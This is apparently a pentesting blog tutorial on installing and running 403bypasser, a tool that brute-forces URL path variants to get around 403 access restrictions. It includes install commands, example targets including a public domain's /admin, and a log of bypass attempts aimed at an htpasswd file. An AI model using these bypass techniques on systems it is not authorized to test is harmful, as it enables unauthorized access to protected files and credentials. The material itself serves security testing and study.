Pentesting Tools

403bypasser – Bypass 403 Restrictions Directory

Bypass 403 – Hi guys, we have a fantastic tool for you all that can reward you if you are a bug hunter and looking for a bug in any web application. 403bypasser automates techniques used to bypass access control restrictions on a landing page. In this tutorial, we will show you the installation and some uses of this tool. Bypass 403

Access control is a core component of data security that controls who can access and use company data and resources. This access control technique is also applied to web applications. The development of certain websites is done with high security. Although we can bypass this access control using automated tools. Bypass 403

The 403bypasser tool automates the techniques to bypass access control restrictions on target pages. 403bypasser tool performs brute force enforcement of possible directories in the target domain that can be bypassed. The 403bypasser is developed in python and is available on GitHub. 403bypasser is an open-source tool and is free to use. 403bypasser supports scanning multiple URLs simultaneously. We can save the results to a text file for further use.

 

Installation : 

Step_1: Use the following command to install python3 and pip or install the tool on your Kali Linux operating system.

sudo apt install git python3 -y
git clone https://github.com/yunemse48/403bypasser.git

 

┌──(root💀OnlineHacking)-[~]
└─# git clone https://github.com/yunemse48/403bypasser.git
Cloning into '403bypasser'...
remote: Enumerating objects: 217, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 217 (delta 21), reused 16 (delta 16), pack-reused 190
Receiving objects: 100% (217/217), 71.25 KiB | 694.00 KiB/s, done.
Resolving deltas: 100% (101/101), done.

┌──(root💀OnlineHacking)-[~]
└─# cd 403bypasser

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# sudo pip3 install -r requirements.txt

 

Step_2: Now move to the tool directory using the following command. You need to move in the directory to run the tool.

cd 403bypasser

 

Step 3: You are in the 403Bypasser directory. Now you need to install the 403Bypasser dependency using the following command.

sudo pip3 install -r requirements.txt

Step_4: All dependencies have been installed in your Kali Linux OS. Now use the following command to run the tool and check the help section.
Now we can control this tool using “python“.

python3 403bypasser.py -h

 

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -h
                                                                                                                                                       
usage: 403bypasser.py [-h] [-u URL] [-U URLLIST] [-d [DIR]] [-D DIRLIST]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     single URL to scan, ex: http://example.com
  -U URLLIST, --urllist URLLIST
                        path to list of URLs, ex: urllist.txt
  -d [DIR], --dir [DIR]
                        Single directory to scan, ex: /admin
  -D DIRLIST, --dirlist DIRLIST
                        path to list of directories, ex: dirlist.txt
                                                                                                                                                       

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# 

 

 

💥 Using : 

As we know that sometimes we are not able to find the sensitive files of the web server, then it works, in that case, to find the given sensitive files using different metacharacters.

python3 403bypasser.py -u http://192.168.1.9 -d htaccess

As you can see, it successfully found the sensitive file by appending the extension in front.

This bad configuration can easily reward you because there are some juicy things in it.

 

You can try to access the sensitive file location by following the same procedure as in the previous step.

python3 403bypasser.py -u http://10.0.3.15 -d htpasswd
┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -u http://10.0.3.15 -d htpasswd
 
 ______________________________________________________________________________
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/

    __ __ ____ _____ __ 
   / // / / __ \__ // /_ __ ______ ____ ______________ _____ ____
  / // /_/ / / //_ </ __ \/ / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ 
 /__ __ / /_/ /__/ / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ /  / 
   /_/  \____/____/_.___/\__, / .___/\__,_/____/____/\___/_/ 
                        /____/_/ 

______________________________________________________________________________ 
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/ 

                                                                                                                                                       
=========== Target URL: http://10.0.3.15 Target Path: /htpasswd ===========

POST --> http://10.0.3.15/htpasswd                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd                         STATUS: 404 SIZE: 271
GET --> http://10.0.3.15//htpasswd//                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/./htpasswd/.                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/%2e/htpasswd                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd..;/                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/..;/                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%20                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%09                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%00                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.json                    STATUS: 200 SIZE: 27
GET --> http://10.0.3.15/htpasswd.css                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.html                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd??                       STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd???                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?testparam               STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd#                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd#test                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/.                       STATUS: 404 SIZE: 271

 

 

 

 

💢 Use 403bypasser Tool : 

Example_1: One URL to scan

python3 403bypasser.py -u http://192.168.1.110 -d htaccess

python3 403bypasser.py -u https://onlinehacking.org -d /admin

Example_2: Path to a list of URLs

python3 403bypasser.py -U list.txt -d /admin

 

Usage :

ArgumentDescriptionExamplesNote
-usingle URL to scanhttp://example.com or IpAll these example usages are interpreted in the same way
-Upath to list of URLs./urllist.txt, ../../urllist.txt, etc.Just provide the path where the file is located 🙂
-dsingle directory to scanadmin or /admin or admin/ or /admin/All these example usages are interpreted in the same way
-Dpath to list of directories./dirlist.txt, ../../dirlist.txt, etc.Just provide the path where the file is located 🙂

Usage_1: python3 403bypasser.py -u https://exampIe.com -d /secret
Usage_2: python3 403bypasser.py -u https://exampIe.com -D dirlist.txt
Usage_3: python3 403bypasser.py -U urllist.txt -d /secret
Usage_4: python3 403bypasser.py -U urllist.txt -D dirlist.txt

 

Suman

Hello, I'm SUMAN from India. I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty. I’m currently learning more about Web Design, Android ROM
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Back to top button
0
Would love your thoughts, please comment.x
()
x